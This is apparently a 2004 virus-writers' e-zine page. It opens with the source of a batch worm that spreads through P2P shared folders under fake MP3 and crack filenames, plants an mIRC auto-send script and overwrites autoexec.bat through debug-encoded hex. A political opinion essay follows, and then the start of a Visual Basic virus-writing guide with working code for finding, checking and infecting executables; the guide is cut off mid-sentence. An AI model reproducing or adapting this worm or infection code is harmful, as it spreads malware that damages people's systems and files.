folder\Linkin_park_somewhere_i_belong.MP3.bat if exist %pat%program files\bearshare\shared\*.* copy l.t + %0 %pat%program files\bearshare\shared\Linkin_Park_somewhere_i_belong.MP3.bat if exist %pat%program files\eDonkey2000\incoming\*.* copy l.t + %0 %pat%program files\eDonkey2000\incoming\Linkin_Park_somewhere_i_belong.MP3.bat echo set hl=yes >t.i if exist %pat%program files\morpheus\my shared folder\*.* copy l.t + %0 %pat%program files\morpheus\my shared folder\HL_cracks.EXE.bat if exist %pat%program files\bearshare\shared\*.* copy l.t + %0 %pat%program files\bearshare\shared\HL_cracks.EXE.bat if exist %pat%program files\eDonkey2000\incoming\*.* copy l.t + %0 %pat%program files\eDonkey2000\incoming\HL_cracks.EXE.bat echo set mad=yes >t.i if exist %pat%program files\morpheus\my shared folder\*.* copy l.t + %0 %pat%program files\morpheus\my shared folder\Madonna_A_Life.MP3.bat if exist %pat%program files\bearshare\shared\*.* copy l.t + %0 %pat%program files\bearshare\shared\Madonna_A_Life.MP3.bat if exist %pat%program files\eDonkey2000\incoming\*.* copy l.t + %0 %pat%program files\eDonkey2000\incoming\Madonna_A_Life.MP3.bat cls ::> Above routine is p2p worming thru morpheus,bearshare and eDonkey2000.this virus would skip the routine if ::> does not have a WINDOWS folder. echo [script]>l.t echo n0=on 1:JOIN:#:{ >>l.t echo n1= /if ( nick == $me ) { halt } >>l.t echo n2= /.dcc send $nick %pat%bush.bat >>l.t echo n3= }>>l.t cls if exist %pat%mirc\*.* copy l.t %path%mirc\script.ini if exist %pat%mirc32\*.* copy l.t %path%mirc32\script.ini if exist %pat%progra~1\mirc\*.* copy l.t %path%progra~1\mirc\script.ini if exist %pat%progra~1\mirc32\*.* copy l.t %path%progra~1\mirc32\script.ini del l.t cls ::> Above routine is mIrc spreading routine :auto if not exist %pat%autoexec.bat goto fin find /c /i "t.l" %pat%autoexec.bat >nul if not errorlevel 1 goto debugscr goto fin :debugscr @echo e 0100 40 65 63 68 6F 20 6F 66 66 20 0D 0A 65 63 68 6F>>b.bat @echo e 0110 20 70 72 65 73 73 20 65 6E 74 65 72 20 74 6F 20>>b.bat @echo e 0120 63 6F 6E 74 69 6E 75 65 2E 2E 2E 20 0D 0A 64 61>>b.bat @echo e 0130 74 65 20 3E 74 2E 6C 20 0D 0A 66 69 6E 64 20 2F>>b.bat @echo e 0140 63 20 2F 69 20 22 4D 6F 6E 22 20 74 2E 6C 20 3E>>b.bat @echo e 0150 6E 75 6C 0D 0A 69 66 20 6E 6F 74 20 65 72 72 6F>>b.bat @echo e 0160 72 6C 65 76 65 6C 20 31 20 67 6F 74 6F 20 6D 6F>>b.bat @echo e 0170 6E 20 0D 0A 66 69 6E 64 20 2F 63 20 2F 69 20 22>>b.bat @echo e 0180 54 75 65 22 20 74 2E 6C 20 3E 6E 75 6C 0D 0A 69>>b.bat @echo e 0190 66 20 6E 6F 74 20 65 72 72 6F 72 6C 65 76 65 6C>>b.bat @echo e 01A0 20 31 20 67 6F 74 6F 20 74 75 65 20 0D 0A 66 69>>b.bat @echo e 01B0 6E 64 20 2F 63 20 2F 69 20 22 77 65 64 22 20 74>>b.bat @echo e 01C0 2E 6C 20 3E 6E 75 6C 0D 0A 69 66 20 6E 6F 74 20>>b.bat @echo e 01D0 65 72 72 6F 72 6C 65 76 65 6C 20 31 20 67 6F 74>>b.bat @echo e 01E0 6F 20 77 65 64 20 0D 0A 66 69 6E 64 20 2F 63 20>>b.bat @echo e 01F0 2F 69 20 22 74 68 75 22 20 74 2E 6C 20 3E 6E 75>>b.bat @echo e 0200 6C 0D 0A 69 66 20 6E 6F 74 20 65 72 72 6F 72 6C>>b.bat @echo e 0210 65 76 65 6C 20 31 20 67 6F 74 6F 20 74 68 75 20>>b.bat @echo e 0220 0D 0A 66 69 6E 64 20 2F 63 20 2F 69 20 22 66 72>>b.bat @echo e 0230 69 22 20 74 2E 6C 20 3E 6E 75 6C 0D 0A 69 66 20>>b.bat @echo e 0240 6E 6F 74 20 65 72 72 6F 72 6C 65 76 65 6C 20 31>>b.bat @echo e 0250 20 67 6F 74 6F 20 66 72 69 20 0D 0A 66 69 6E 64>>b.bat @echo e 0260 20 2F 63 20 2F 69 20 22 73 61 74 22 20 74 2E 6C>>b.bat @echo e 0270 20 3E 6E 75 6C 0D 0A 69 66 20 6E 6F 74 20 65 72>>b.bat @echo e 0280 72 6F 72 6C 65 76 65 6C 20 31 20 67 6F 74 6F 20>>b.bat @echo e 0290 73 61 74 20 0D 0A 66 69 6E 64 20 2F 63 20 2F 69>>b.bat @echo e 02A0 20 22 73 75 6E 22 20 74 2E 6C 20 3E 6E 75 6C 0D>>b.bat @echo e 02B0 0A 69 66 20 6E 6F 74 20 65 72 72 6F 72 6C 65 76>>b.bat @echo e 02C0 65 6C 20 31 20 67 6F 74 6F 20 73 75 6E 20 0D 0A>>b.bat @echo e 02D0 20 0D 0A 3A 6D 6F 6E 20 0D 0A 63 6C 73 20 0D 0A>>b.bat @echo e 02E0 65 63 68 6F 20 4D 61 73 73 61 67 65 20 6F 66 20>>b.bat @echo e 02F0 74 68 65 20 64 61 79 20 0D 0A 65 63 68 6F 2E 20>>b.bat @echo e 0300 0D 0A 65 63 68 6F 20 22 57 68 61 74 20 77 61 73>>b.bat @echo e 0310 20 49 20 74 61 6C 6B 69 6E 67 20 61 62 6F 75 74>>b.bat @echo e 0320 20 6A 75 73 74 20 6E 6F 77 3F 20 49 20 6A 75 73>>b.bat @echo e 0330 74 20 63 61 6E 27 74 20 72 65 6D 65 6D 62 65 72>>b.bat @echo e 0340 22 20 0D 0A 65 63 68 6F 20 20 20 20 20 20 20 20>>b.bat @echo e 0350 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20>>b.bat @echo e 0360 20 20 20 20 20 20 2D 20 55 53 20 70 72 65 73 69>>b.bat @echo e 0370 64 65 6E 74 20 47 2E 20 57 2E 20 42 75 73 68 20>>b.bat @echo e 0380 0D 0A 70 61 75 73 65 3E 6E 75 6C 20 0D 0A 67 6F>>b.bat @echo e 0390 74 6F 20 65 6E 64 20 0D 0A 20 0D 0A 3A 74 75 65>>b.bat @echo e 03A0 20 0D 0A 63 6C 73 20 0D 0A 65 63 68 6F 20 4D 61>>b.bat @echo e 03B0 73 73 61 67 65 20 6F 66 20 74 68 65 20 64 61 79>>b.bat @echo e 03C0 20 0D 0A 65 63 68 6F 2E 20 0D 0A 65 63 68 6F 20>>b.bat @echo e 03D0 22 54 68 65 20 77 61 72 20 69 6E 20 49 72 61 71>>b.bat @echo e 03E0 20 69 73 20 6A 75 73 74 69 66 69 65 64 20 61 73>>b.bat @echo e 03F0 20 49 20 77 61 6E 74 20 74 6F 20 67 65 74 20 72>>b.bat @echo e 0400 69 64 20 6F 66 20 74 68 65 20 57 65 70 70 6F 6E>>b.bat @echo e 0410 73 20 6F 66 20 4D 61 73 68 20 0D 0A 65 63 68 6F>>b.bat @echo e 0420 20 20 44 79 73 74 72 75 63 6B 73 79 6E 2E 22 20>>b.bat @echo e 0430 0D 0A 65 63 68 6F 20 20 20 20 20 2D 55 53 20 50>>b.bat @echo e 0440 72 65 73 69 64 65 6E 74 20 47 2E 20 57 2E 20 42>>b.bat @echo e 0450 75 73 68 20 77 72 69 74 65 73 20 61 62 6F 75 74>>b.bat @echo e 0460 20 77 68 79 20 69 74 20 69 73 20 6A 75 73 74 69>>b.bat @echo e 0470 66 69 65 64 20 74 6F 20 67 6F 20 74 6F 20 77 61>>b.bat @echo e 0480 72 20 0D 0A 70 61 75 73 65 3E 6E 75 6C 20 0D 0A>>b.bat @echo e 0490 67 6F 74 6F 20 65 6E 64 20 0D 0A 20 0D 0A 3A 77>>b.bat @echo e 04A0 65 64 20 0D 0A 63 6C 73 20 0D 0A 65 63 68 6F 20>>b.bat @echo e 04B0 4D 61 73 73 61 67 65 20 6F 66 20 74 68 65 20 64>>b.bat @echo e 04C0 61 79 0D 0A 65 63 68 6F 2E 20 0D 0A 65 63 68 6F>>b.bat @echo e 04D0 20 22 49 6D 70 72 65 61 63 68 20 54 68 61 74 20>>b.bat @echo e 04E0 42 61 73 74 61 72 64 20 21 21 22 20 0D 0A 65 63>>b.bat @echo e 04F0 68 6F 20 20 20 20 20 20 20 20 2D 20 50 72 6F 74>>b.bat @echo e 0500 65 73 74 65 72 20 73 69 67 6E 20 64 75 72 69 6E>>b.bat @echo e 0510 67 20 74 68 65 20 49 72 61 71 69 20 77 61 72 20>>b.bat @echo e 0520 0D 0A 70 61 75 73 65 3E 6E 75 6C 20 0D 0A 67 6F>>b.bat @echo e 0530 74 6F 20 65 6E 64 20 0D 0A 0D 0A 3A 74 68 75 20>>b.bat @echo e 0540 0D 0A 63 6C 73 20 0D 0A 65 63 68 6F 20 4D 61 73>>b.bat @echo e 0550 73 61 67 65 20 6F 66 20 74 68 65 20 64 61 79 20>>b.bat @echo e 0560 0D 0A 65 63 68 6F 2E 20 0D 0A 65 63 68 6F 20 22>>b.bat @echo e 0570 48 65 20 6C 6F 6F 6B 73 20 6C 69 6B 65 20 74 68>>b.bat @echo e 0580 65 20 41 6D 65 72 69 63 61 6E 20 4C 69 63 65 22>>b.bat @echo e 0590 20 0D 0A 65 63 68 6F 20 20 20 20 20 20 20 20 20>>b.bat @echo e 05A0 20 20 20 2D 20 4D 61 64 6F 6E 6E 61 2C 73 61 79>>b.bat @echo e 05B0 69 6E 67 20 61 62 6F 75 74 20 55 73 20 50 72 65>>b.bat @echo e 05C0 73 69 64 65 6E 74 20 47 2E 20 57 2E 20 42 75 73>>b.bat @echo e 05D0 68 20 0D 0A 70 61 75 73 65 3E 6E 75 6C 20 0D 0A>>b.bat @echo e 05E0 67 6F 74 6F 20 65 6E 64 20 0D 0A 0D 0A 3A 66 72>>b.bat @echo e 05F0 69 20 0D 0A 63 6C 73 20 0D 0A 65 63 68 6F 20 4D>>b.bat @echo e 0600 61 73 73 61 67 65 20 6F 66 20 74 68 65 20 44 61>>b.bat @echo e 0610 79 20 0D 0A 65 63 68 6F 2E 0D 0A 65 63 68 6F 20>>b.bat @echo e 0620 22 49 20 73 68 6F 75 6C 64 20 68 61 76 65 20 76>>b.bat @echo e 0630 6F 74 65 64 20 66 6F 72 20 41 6C 20 47 6F 72 65>>b.bat @echo e 0640 20 77 68 65 6E 20 49 20 67 6F 74 20 74 68 65 20>>b.bat @echo e 0650 63 68 61 6E 63 65 2E 22 20 0D 0A 65 63 68 6F 20>>b.bat @echo e 0660 20 20 20 20 20 20 20 20 20 20 2D 20 77 68 61 74>>b.bat @echo e 0670 20 61 20 35 30 20 79 65 61 72 20 6F 6C 64 20 6D>>b.bat @echo e 0680 61 6E 20 66 65 65 6C 73 20 61 62 6F 75 74 20 55>>b.bat @echo e 0690 53 20 50 72 65 73 69 64 65 6E 74 20 47 2E 20 57>>b.bat @echo e 06A0 2E 20 42 75 73 68 20 0D 0A 70 61 75 73 65 3E 6E>>b.bat @echo e 06B0 75 6C 20 0D 0A 67 6F 74 6F 20 65 6E 64 20 0D 0A>>b.bat @echo e 06C0 0D 0A 3A 73 61 74 20 0D 0A 63 6C 73 20 0D 0A 65>>b.bat @echo e 06D0 63 68 6F 20 4D 61 73 73 61 67 65 20 6F 66 20 74>>b.bat @echo e 06E0 68 65 20 64 61 79 20 0D 0A 65 63 68 6F 2E 0D 0A>>b.bat @echo e 06F0 65 63 68 6F 20 22 57 65 20 66 6F 75 6E 64 20 6E>>b.bat @echo e 0700 6F 20 57 4D 44 73 20 62 75 74 20 6C 6F 61 64 73>>b.bat @echo e 0710 20 6F 66 20 70 69 63 74 75 72 65 73 2C 70 6F 72>>b.bat @echo e 0720 74 72 61 69 74 73 20 61 6E 64 20 73 74 61 74 75>>b.bat @echo e 0730 65 73 20 6F 66 20 53 61 64 64 61 6D 22 20 0D 0A>>b.bat @echo e 0740 65 63 68 6F 20 20 20 20 20 20 20 20 20 20 20 20>>b.bat @echo e 0750 20 20 20 20 20 20 20 2D 20 61 20 55 53 20 73 6F>>b.bat @echo e 0760 6C 64 69 65 72 20 73 70 65 61 6B 73 20 6F 66 20>>b.bat @echo e 0770 74 68 65 20 49 72 61 71 69 20 77 61 72 20 0D 0A>>b.bat @echo e 0780 70 61 75 73 65 3E 6E 75 6C 20 0D 0A 67 6F 74 6F>>b.bat @echo e 0790 20 65 6E 64 20 0D 0A 0D 0A 3A 73 75 6E 20 0D 0A>>b.bat @echo e 07A0 63 6C 73 20 0D 0A 65 63 68 6F 20 4D 61 73 73 61>>b.bat @echo e 07B0 67 65 20 6F 66 20 74 68 65 20 64 61 79 20 0D 0A>>b.bat @echo e 07C0 65 63 68 6F 2E 0D 0A 65 63 68 6F 20 22 20 75 68>>b.bat @echo e 07D0 2E 2E 77 68 65 72 65 20 69 73 20 74 68 65 20 74>>b.bat @echo e 07E0 6F 69 6C 65 74 20 61 67 61 69 6E 3F 3F 20 22 20>>b.bat @echo e 07F0 0D 0A 65 63 68 6F 20 20 20 20 20 20 20 20 20 20>>b.bat @echo e 0800 2D 20 55 53 20 70 72 65 73 69 64 65 6E 74 20 64>>b.bat @echo e 0810 75 72 69 6E 67 20 68 69 73 20 73 74 61 79 20 61>>b.bat @echo e 0820 74 20 74 68 65 20 57 68 69 74 20 48 6F 75 73 65>>b.bat @echo e 0830 20 0D 0A 70 61 75 73 65 3E 6E 75 6C 20 0D 0A 67>>b.bat @echo e 0840 6F 74 6F 20 65 6E 64 20 0D 0A 0D 0A 3A 65 6E 64>>b.bat @echo e 0850 20 0D 0A 65 63 68 6F 2E 0D 0A 65 63 68 6F 20 54>>b.bat @echo e 0860 68 69 73 20 6D 61 73 73 61 67 65 20 69 73 20 62>>b.bat @echo e 0870 72 6F 75 67 68 74 20 74 6F 20 79 6F 75 20 62 79>>b.bat @echo e 0880 20 42 61 74 2E 42 75 73 68 20 0D 0A 65 63 68 6F>>b.bat @echo e 0890 20 42 61 74 2E 42 75 73 68 20 62 79 20 61 64 69>>b.bat @echo e 08A0 6F 75 73 20 5B 72 52 6C 66 5D 20 0D 0A 70 61 75>>b.bat @echo e 08B0 73 65 3E 6E 75 6C 20 0D 0A 64 65 6C 20 74 2E 6C>>b.bat @echo e 08C0 20 0D 0A 63 61 6C 6C 20 62 75 73 68 2E 62 61 74>>b.bat @echo e 08D0 0D 0A 77 69 6E 0D 0A 65 78 69 74 20 0D 0A 00>>b.bat echo rcx>>b.bat echo 7DE>>b.bat echo n%pat%autoexec.bat>>b.bat echo w>>b.bat echo q>>b.bat debug < b.bat del b.bat ::> Above code is the payload code.It would show everyday massages about the US president. ::> it also runs the virus for simple "residency". :fin exit =============================================[ end of code ]================================================== .:Greets:. Greets go to the few guys I really cared: Jackie [tantrum],Slage,RaiD,philie [rRlf],SPTH [rRlf],Industry [rRlf],Benny [29a],KD [metaphase] DvL,NeKro,Metal_ and the rest of the ppl I met on IRC (the good,the bad and the stupid m***********s) (non-vx)Irfan,taufik,hamizan,Frankie "Charmander" Wong,Han Kiat,Spencer,the 3NAs and all of the guys and gals that i've met IRL. Greets to groups (VX and Non-VX): rRlf,29a,Metaphase,eBCVG,b8,Tantrum,29a,MHA,haxors_Labs,r00t-access,the Medan Hacking Group and WoH. .:Contacts:. website: http:\\adiousinet.cjb.net or http:\\www.adious.tk email: adious666@hotmail.com group site:http:\\rrlf.de

articles

Obvious stupidity of society Adious Obvious stupidity of society by adious .: Type : Opinions :. .: Date : 21\03\04 .: By Adious [rRlf] :. NOTE : This text has nothing to do with "How-to's" and tutorials. If your intention was to find valuable info on programming or anything else, this text will not be a help for you. Tough luck, huh? :) .:Introduction:. Ok, so you may want to know why I even want to write something like this: Mainly because of the low decline of the society that we live in for the last many years or so. The USA gov. decided to got to war last year in Iraq and it sickens me to the gut. The women and children dying. Then comes normal teenage shit: The overgrowing "need" for material things in life. Nobody thought them that "the clothes do not make the man" but every rapper would tell the kids that they need the "bling-bling" (rap for "the shit made of gold") to live and the over- emphasis on the "good life" (kazillions of dollars, mansion, blah, blah blah). These and more in this text called the "Obvious stupidity of society". I will write sequels to this text as and when I feel the need (freedom of movement!). Hope you enjoy the hour or so of reading this text. -adious [rRlf] "The only real weapon in war is the truth" - Inspired quote from a book. Greets to the person who originally said this :) .: USA govs' decision to go to war: Biggest lie to human rights :. .: and human life under the propagandical name of "war on terror":. A long name for a subtitle? Well, that's what the world's biggest terrorist organisation stated after the 9/11 attacks on the WTC in NYC. There is proof that the government knew that the attacks would happen but did not act on the intelligence reports. Why? They wanted a reason for them to go to war in the Middle Eastern countrys. Their new policy on "attacking rouge nations before they attack us" is just too stupid to comprehend by any intelligent human being on the face of this earth. It's like saying: "Since I know that you would attack me, even if the answer from you is 'no', I would still attack you right now". I wonder why they attack people who are called "terrorist" without proof that they are really "terrorist". This goes to show that US govenment did not actually follow their own law: Everybody is inocent until proven guilty. Very hard to swallow, huh? Back to the "war on terror", they went to the UN mandate for an attack on Iraq. Some of the nations, which have a brain and a heart, vetoed the idea. Bush used the term "Axis of Evil" on Iraq. Look at what happened to Afghanistan and you'll find a shock of your lives: They destroy lives and they just leave you to pick yourself up. They destroy buildings and peace but they like to say they are "building progress in the rebuilding of the country". Bullshit. They changed many times the reason for attacking Iraq: 1) There are weapons of mass destruction which the US has all the while. The US army has been developing "mini-nuke bunker busting" bombs to dig out terrorist. Hows that for hypocritical? 2) They say that Iraq used to host terrorists in their country. The key word is "USED". They obviously forgot that Saddam is much of a changed man and that he would do anything, including letting foreign nuke inspectors come in. Hell, the US couldn't even find the bloody WMDs. Does it mean that the US gov is lying to the international community? 3) Here's the biggest lie in the face of the century. The people of Iraq want to be liberated. Hell, if they really want to be liberated, they should leave Iraq, but did they? NO, because they were already liberated from crime and they had peace in their country. When Iraq started researching on making nuclear bombs, the USA started wagging their tongues on the danger that would happen when a rougue nation has the technology. But USA has nukes since they started using it on Japan during WW2. They were the ones who started the idea of ICBMs (intercon- tinental ballistic missiles) and made (and tested) the first hydrogen bomb (or a thermonuclear bomb). I'm getting sick and tired of looking at this topic. The thing is, Bush has lead us to a war that would never end and that would spawn new faces in the international terrorist scene. If they could give some efforts on having 6 way talks on the nuclear issue, why not with Iraq? Oh, I forgot Iraq has no WMDs at all! It's all an illusion in the myopic eyes of G. W. Bush. You decide, do you want to follow blindly the "idiots of war" or do you want to follow a man who is a good leader and would do his best to serve his country and the world? You decide. .: Myth : Money makes the world go round :. It's just too obvious that the many teens today are forced into the shell of which they can not really get out. We are *forced* by our peers to do this and that, wear this and that. This is bullshit. How many times do you actually walk out of the house in rather cheap but very comfortable clothes? I thought they would actually go and praise the person for a good choice of clothing but it turns out that the "normal" teenager would actually feel better in the most expensive clothings ever. It's very saddening that many people's happyness is actually dictated by the amount of money they get or have. They probably think that this has got to do with the material world that they live in today. If it were 20 years ago, many kids won't usually use very expensive clothing. How many people are very happy when they have less and less money? There are a few but most would like a very expensive lifestyle. Too much money in society would mean that we would not really form real relationships. Most ppl squable over money. It seems that money is thicker than blood as many families fight over the wealth of their parents. Not only does it destroys families but your choices of life. Many people actually quit their fav. job for a higher paying one. Isn't it sad? I'm not gonna give half of my life away for a job that is not fun and cool for me. Lets kill the fad. .: "Freedom" in the real world is just a word :. There is a hell lot of truth when it comes to the lack of freedom of speech. I may not even speak on something so "hurtfull" but the govern- ment wants to keep my freedom in control. But you know what, nothing could actually stop the fad of the internet and nobody could stop computer knowledge spreading. In singapore, there is a lot of debate on the topic of blocking access to some websites. They must restrict ppl access to their fav sites just to be happy (I understand if they do this in shool but I just don't see the point if you block internet access for personal use). Try going out to parks performing demonstrations and not to be touched by the pigs but to be kicked into a room being asked question after question and having your school application revoked. As long as my parents are alive on this earth, they will control me in doing some things but as I get older i will experience more freedom. But what type of freedom are you seeking for? What do you really want? .: Hypocrites on the NET and in real life :. Do you find it really funny when someone actually kinda hates your artwork that you've put on your website (for example) and that sick bastard did not actually create something? Well, this type of people kinda sucks some life out of you. Do you actually have a parent who actually asks you to be more hardworking in terms of work but when you look at their qualification exams that they took when they were our age, they did not score really well? Well what happens to us? In real life, nobody would give a damn of who you are and at some time you feel like there is no worth living, but in fact, there are some people that care for you. You only kinda overlooked the bad points form the good points. Wether or not the things are going fine for you or that this is hell to you, is really what your mind thinks about. If your peers actually make fun of you, would you know that there are some people that actually care for you and in the end it's all that counts? Maybe that guy that made fun of you is a real sucker who kinda failed in everything and that they want respect by pushing ppl around. In life there are many hypocrites who feel that you are shit but in reality everyone is the same. Nobody has the right to make you feel sad and angry but you could overcome it. Afterall, "An eye for an eye makes the whole world blind" and "only stupid people get angry and let their frustrations control them". Always remember that people's opinions WILL NEVER follow yours, so why bother following the crowd. The real meaning of opinion is "a belief that is not proven to be true." If ppl's opinion are really true, they won't call it "opinions", they'll call it 'laws'. So think about it. .: Ending :. Arrrrghhh! Why the hell is it so soon? I'm sorry if I can't write some very long text for a good cause but I'll do so next time. Do you have an opinion to spread or a cause to make known? Write to me by e-mail. .:Contacts:. Website : www.adious.cjb.net .: Parting words..:. "Kill The trends and follow you own route" [EOF] adious copyright 2004

articles

visual basic virus writing guide v1.0 Alcopaul ============================================================================================================================= ============================================================================================================================= ================================ alcopaul's visual basic virus writing guide v1.0 =========================================== ============================================================================================================================= ============================================================================================================================= \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\ I - introduction \\ \\\\\\\\\\\\\\\\\\\\ damn to time-and-bytes-consuming-long introductions... VB is RAD so boys and girls, LET'S GET IT ON! \\\\\\\\\\\\\\\\\\\\ II - preliminaries \\ \\\\\\\\\\\\\\\\\\\\\\ before going to the nitty gritties of vb file infection, we should tackle first the preliminary concepts... ************************* a) getting started ****** ************************* before starting to write a virus in visual basic, you should first know how to "speak" the visual basic language.. this means that you should know the proper syntaxing, the relation of the commands, the way of manipulating variables using the built in vb commands, etc... if you have microsoft office fully installed, then you'll surely have no problem of finding a visual basic resource and reference.. open windows explorer and search for VBLR6.chm... it contains the visual basic language reference... if win32asm has win32.hlp then visual basic has vblr6.chm... having a vb programming book is also helpful so you won't undergo the trial and error of testing functions against variables and combining functions to make a program... and also study viral and non viral vb sources coz this will surely help... before making it to the top, you must start first in scratch.. before i forget, you must also have Microsoft VB6 compiler... *************************** b) resolving virus path *** *************************** your first task is to resolve the path of the virus... why? so your virus can do its dirty work whether it's contained in any directory or the root directory.... ---------------------------------------- code II.a ---------------------------------------- dim virpath as string virpath = app.path if right(virpath, 1) <> "\" then virpath = virpath & "\" 'set virpath to (root):\ 'examine if path is a directory or subdirectory 'if yeah, resolve directory path by adding "\" ---------------------------------------- ******************************* c) avoiding identity crisis *** ******************************* we'll treat exe, scr, com, pif files as the same... why? try renaming your notepad.exe to notepad.scr and execute it. notepad window will appear... renaming notepad.exe to .com or .pif and executing it will have the same effect. the notepad window will still appear... you must first establish the identity of your virus... if you want to target exe files, you should make your virus treat itself as a ".exe" file... when a virus that treats itself as an exe file infects a .scr file, executing the infected .scr won't pass the control to the ".exe" virus... the virus assumes the file type of its host... so a ".exe" virus in a ".scr" host will treat itself as a ".scr"... so a ".exe" virus executed as a ".scr" will produce an error... in other words, your virus will have a problem with its identity... ---------------------------------------- code II.b ---------------------------------------- dim virbyte1 as string dim virpath as string virpath = app.path if right(virpath, 1) <> "\" then virpath = virpath & "\" Open virpath & App.EXEName & ".exe" For Binary Access Read As #2 virbyte1 = Space(number of bytes) Get #2, , virbyte1 Close #2 'setting the virus identity ---------------------------------------- ******************************************************************************************************** d) identifying if the file is infected then a choice of infecting all files at once or one at a time *** ******************************************************************************************************** after establishing the identity of your virus, the next task is to do is to identify the target files... rule : virus will infect file types of its kind... ".exe" virus infects ".exe" files.. ".com" virus infects ".com" files.... ".scr" virus infects ".scr" files ... ".pif" virus infects ".pif" files... after the virus identifies the target files, check if the host is infected so it won't be infecting the same files again and again... a virus must not infect an infected file... an real world example : if you're infected with AIDS, then you'll NOT be reinfected by AIDS... --------------------------------------- code II.c.i --------------------------------------- dim hlen as string dim vsig as string dim virpath as string dim host as string virpath = app.path if right(virpath, 1) <> "\" then virpath = virpath & "\" Open virpath & host For Binary Access Read As #1 hlen = (LOF(1)) vsig = Space(hlen) Get #1, , vsig Close #1 marker = Right(vsig, 9) if marker = "signature" then 'search for more else 'infect --------------------------------------- why did i put 9 in marker = Right(vsig, 9)? coz the length of marker is 9... s-i-g-n-a-t-u-r-e = 9 if the host is infected then search for more... if the host is clean, your next task is to infect it... you can make your virus infect all files at once or infect one file per run... for now, we'll only concern on virus infecting files in its own directory... ---------------------------------------- code II.c.ii (infect all at once) ---------------------------------------- dim virpath as string dim enumhosts as string dim a as string dim hosts, eachhost dim hlen as string dim vsig as string dim marker as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" enumhosts = Dir$(virpath & "*.exe") While enumhosts <> "" a = a & enumhosts & "/" enumhosts = Dir$ Wend hosts = Split(a, "/") For Each eachhost In hosts Open virpath & eachhost For Binary Access Read As #1 hlen = (LOF(1)) vsig = Space(hlen) Get #1, , vsig Close #1 marker = Right(vsig, 9) if marker = "signature" then '--------------- GoTo notinfected Else GoTo infected End If notinfected: 'infect eachhost infected: Next eachhost '--------------- ----------------------------------------- <<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>> ---------------------------------------- code II.c.iii (infect one file per run) ---------------------------------------- dim virpath as string dim enumhosts as string dim a as string dim hosts, eachhost dim hlen as string dim vsig as string dim marker as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" enumhosts = Dir$(virpath & "*.exe") While enumhosts <> "" a = a & enumhosts & "/" enumhosts = Dir$ Wend hosts = Split(a, "/") For Each eachhost In hosts Open virpath & eachhost For Binary Access Read As #1 hlen = (LOF(1)) vsig = Space(hlen) Get #1, , vsig Close #1 marker = Right(vsig, 9) if marker = "signature" then '---------------- GoTo notinfected Else GoTo infected End If notinfected: 'infect eachhost Exit For '!!! infected: Next eachhost '---------------- ----------------------------------------- variable enumhosts will enumerate all the ".exe" files in the current directory with the virus.... it will store the result in variable a... for example, the virus is in c:\ in which notepad.exe, calc.exe, explorer.exe etc are present... when virus runs, variable a will contain, -------------------------------------------- a = notepad.exe/calc.exe/explorer.exe/... etc.. -------------------------------------------- then we'll create an array of filenames from variable a using split function then for each filename in the array, examine if the file is infected or not.... *** this routine makes the virus infect all the target files <<< code II.c.ii >>> '--------------- ... ... GoTo notinfected Else GoTo infected End If notinfected: 'infect eachhost infected: Next eachhost '--------------- *** this routine infects one file per run... <<< code II.c.iii >>> '---------------- ... ... GoTo notinfected Else GoTo infected End If notinfected: 'infect eachhost Exit For '!!! stop infecting others after infecting a file infected: Next eachhost '---------------- **************************** e) regenerating the host *** **************************** the only way we can regenerate the host from a virus/host file is to save the host's bits and bytes into a file, and let the virus execute that file... i only saw two ways of executing the spawned host file from the infected file... i'm lazy to research for more so i just borrowed those routines from vb5 virus by murkry and lennon virus by the walrus... -------------------------------------------- vb5 method -------------------------------------------- Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF 'execute spawned host file idProg = Shell("c:\hostfile.ext", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill "c:\hostfile.ext" ---------------------------------------------- ---------------------------------------------- lennon method ---------------------------------------------- Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long Private Declare Function CreateProcessA Lib "kernel32" (ByVal _ lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _ lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _ ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _ ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _ lpStartupInfo As STARTUPINFO, lpProcessInformation As _ PROCESS_INFORMATION) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Const NORMAL_PRIORITY_CLASS = &H20& Private Const INFINITE = -1& Public Sub ExecCmd(cmdline$) Dim proc As PROCESS_INFORMATION Dim start As STARTUPINFO Dim ReturnValue As Integer start.cb = Len(start) ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 1&, NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc) Do ReturnValue = WaitForSingleObject(proc.hProcess, 0) DoEvents Loop Until ReturnValue <> 258 ReturnValue = CloseHandle(proc.hProcess) End Sub .... .... 'execute the regenerated host CommandArgument = Command() ExecCmd "hostfile.ext" & " " & CommandArgument Kill "hostfile.ext" ------------------------------------------- we've seen two methods.... and with a little research you can make a new one... if you're damn lazy like me, you must decide what to use from the previously laid routine... for now, we'll use 